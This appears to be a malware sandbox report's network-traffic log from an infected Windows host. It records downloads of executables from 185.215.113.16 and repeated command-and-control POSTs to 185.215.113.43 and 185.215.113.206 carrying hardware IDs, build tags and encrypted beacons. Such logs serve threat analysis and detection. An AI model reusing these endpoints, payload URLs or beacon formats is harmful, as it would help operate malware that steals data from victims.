00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:43 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:49 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:03 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:11 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:17 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002776001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002777001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build"tale------CGHDAKKJJJKJKECBGCGD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002778001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"tale------EBAFBGIDHCBFHIECFCBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002779001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 